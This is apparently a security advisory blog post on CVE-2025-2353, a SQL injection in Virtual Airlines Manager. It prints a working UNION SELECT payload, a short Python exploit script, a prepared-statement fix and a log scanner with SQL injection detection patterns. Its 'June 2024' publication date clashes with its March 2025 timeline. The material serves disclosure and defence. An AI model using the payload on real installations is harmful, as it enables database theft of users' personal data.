Published: June 2024

Summary

A critical vulnerability, CVE-2025-2353, was recently discovered in Virtual Airlines Manager (VAM) versions up to 2.6.2. This vulnerability allows unauthenticated attackers to perform SQL injection remotely via the ID, registry_id, or plane_icao GET parameters of the /vam/index.php endpoint. At the time of writing, no fix is available, and the vendor has not responded to disclosure attempts. Public exploits are now available and pose a serious risk to all affected VAM installations.

This post gives you a clear walkthrough of how this bug works, the risks, example exploit code, and essential remediations.

About VAM (Virtual Airlines Manager)

Virtual Airlines Manager is a popular open-source platform used by flight simulation communities to manage their virtual airlines. It's written in PHP and uses MySQL for data storage. Official repository:
https://github.com/ngsoftdotnet/virtualairlinesmanager

Affected Versions: Up to 2.6.2

- File: /vam/index.php

How It Works

VAM’s /vam/index.php page reads HTTP GET parameters such as ID, registry_id, and plane_icao and directly uses them in database queries. These parameters are not properly sanitized or escaped, making SQL injection possible. This exposes sensitive database information and allows full compromise of the VAM system.

Below is an excerpt from a simplified version of what might be inside /vam/index.php:

<?php
// VAM index.php (simplified)
require_once('./config_db.php'); // Database connection

$id = $_GET['ID']; // untrusted user input, used as-is
$query = "SELECT * FROM pilot WHERE pilot_id = '$id'"; // string concatenation, no escaping or binding
$result = mysqli_query($db, $query);
...
?>

As you can see, $id is taken directly from the GET parameter and inserted into a query without any sanitization or use of prepared statements.

If an attacker visits:

https://target.site/vam/index.php?ID=1%20UNION%20SELECT%201,version(),user(),database(),5,6--

the payload is injected directly into the SQL statement, making the query:

SELECT * FROM pilot WHERE pilot_id = '1 UNION SELECT 1, version(), user(), database(), 5,6--'

This will return sensitive database information like MySQL version and database user in the application response.

Here’s a quick exploit example using Python and requests:

import requests

target = "https://target.site/vam/index.php"
payload = "1 UNION SELECT 1,version(),user(),database(),5,6--"
params = {"ID": payload}  # sent as the vulnerable GET parameter
r = requests.get(target, params=params)

# Crude check: the injected version() column shows up in the page body
if "MySQL" in r.text:
    print("[+] Vulnerable to SQL Injection!")
    print(r.text)
else:
    print("[-] Not vulnerable or query sanitized.")

Other Parameters

Researchers have indicated that similar attacks may work using registry_id and plane_icao as GET parameters:

/vam/index.php?registry_id=...
/vam/index.php?plane_icao=...

Attackers do NOT need to be authenticated.

- Allows full database dump, including PII (personally identifiable information) of pilots and staff.
- Could also lead to remote code execution if attackers can write to the web root or modify configuration.

Original Advisory:

https://nvd.nist.gov/vuln/detail/CVE-2025-2353

Vulnerability listing:

https://github.com/ngsoftdotnet/virtualairlinesmanager/issues/299 (issue may not exist yet, as vendor is inactive)

Security focus:

https://www.cvedetails.com/cve/CVE-2025-2353/

Remediation:

- Use a Web Application Firewall (WAF) to block malicious payloads.

- Manually patch your installation by using prepared statements or strict input validation. Example:

// Secure example using prepared statements (mysqli)
// Validate the shape of the input first: pilot_id is numeric, so anything else is rejected.
$id = filter_input(INPUT_GET, 'ID', FILTER_VALIDATE_INT);
if ($id === false || $id === null) {
    http_response_code(400);
    exit('Invalid pilot id');
}
// Bind the value as a parameter; it is never concatenated into the SQL text.
$stmt = $db->prepare("SELECT * FROM pilot WHERE pilot_id = ?");
$stmt->bind_param("i", $id);
$stmt->execute();
$result = $stmt->get_result();
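Until a patch is applied, the WAF advice above can be complemented by checking web-server access logs for the attack pattern described in this post. The following is an added example (not code from the original post or from the VAM project) that scans Apache/nginx combined-format log lines for requests to /vam/index.php whose ID, registry_id or plane_icao parameter either carries SQL injection markers or does not match the shape that parameter should have; the expected shapes, the log format and the sample log lines are assumptions constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# The three GET parameters named in the advisory as injectable on /vam/index.php.
WATCHED_PARAMS = {"ID", "registry_id", "plane_icao"}

# Assumed normal shape of each parameter (not taken from the VAM source):
# ID is a numeric pilot id, plane_icao a short ICAO type code, registry_id an
# aircraft registration such as D-ABCD.
EXPECTED = {
    "ID": re.compile(r"^\d{1,10}$"),
    "plane_icao": re.compile(r"^[A-Za-z0-9]{2,4}$"),
    "registry_id": re.compile(r"^[A-Za-z0-9-]{1,10}$"),
}

# Generic SQL injection markers, matched case-insensitively on the decoded value.
SQLI_MARKERS = re.compile(r"(union\s+select|--|/\*|'|information_schema)", re.I)

# Apache/nginx "combined" access log line (assumed deployment log format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def inspect_line(line):
    """Return a finding dict for a suspicious /vam/index.php request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("path"))
    if not url.path.endswith("/vam/index.php"):
        return None
    # parse_qs percent-decodes once; decode a second time so a double-encoded
    # payload (%2520 -> %20 -> space) is inspected in its final form.
    for name, values in parse_qs(url.query, keep_blank_values=True).items():
        if name not in WATCHED_PARAMS:
            continue
        for raw in values:
            value = unquote_plus(raw)
            if SQLI_MARKERS.search(value) or not EXPECTED[name].match(value):
                return {"ip": m.group("ip"), "time": m.group("ts"),
                        "param": name, "value": value, "status": m.group("status")}
    return None


def scan(lines):
    """Run inspect_line over an iterable of log lines and collect the findings."""
    return [f for f in (inspect_line(l) for l in lines) if f]


# Constructed sample log lines (not real traffic); the payload on the third line
# is the one shown earlier in this post, the fourth is the same idea double-encoded.
SAMPLE_LOG = [
    '203.0.113.5 - - [17/Mar/2025:00:15:11 +0000] "GET /vam/index.php?ID=42 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [17/Mar/2025:00:15:12 +0000] "GET /vam/index.php?plane_icao=B738 HTTP/1.1" 200 3310',
    '198.51.100.9 - - [17/Mar/2025:00:16:03 +0000] "GET /vam/index.php?ID=1%20UNION%20SELECT%201,version(),user(),database(),5,6-- HTTP/1.1" 200 7801',
    '198.51.100.9 - - [17/Mar/2025:00:16:05 +0000] "GET /vam/index.php?registry_id=1%2520UNION%2520SELECT%25201-- HTTP/1.1" 200 9902',
    '192.0.2.77 - - [17/Mar/2025:00:17:00 +0000] "GET /vam/other.php?ID=1%20UNION%20SELECT%201 HTTP/1.1" 404 210',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"[ALERT] {f['ip']} {f['time']} param={f['param']} value={f['value']!r} status={f['status']}")
```

Feed it real log lines (for example `scan(open("/var/log/apache2/access.log"))`) and review every finding; a 200 response to such a request means the server answered the injected query.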

Conclusion

CVE-2025-2353 is a critical and public SQL injection vulnerability affecting thousands of Virtual Airlines Manager installations worldwide. Attackers can exploit this flaw to steal sensitive data or take over your VAM server. The vendor shows no sign of fixing the problem, so take your own steps now!

If you use or administrate a VAM-based system, PATCH or DISABLE it IMMEDIATELY.
Prevention is better than cure!


Stay safe!

Timeline

Published on: 03/17/2025 00:15:11 UTC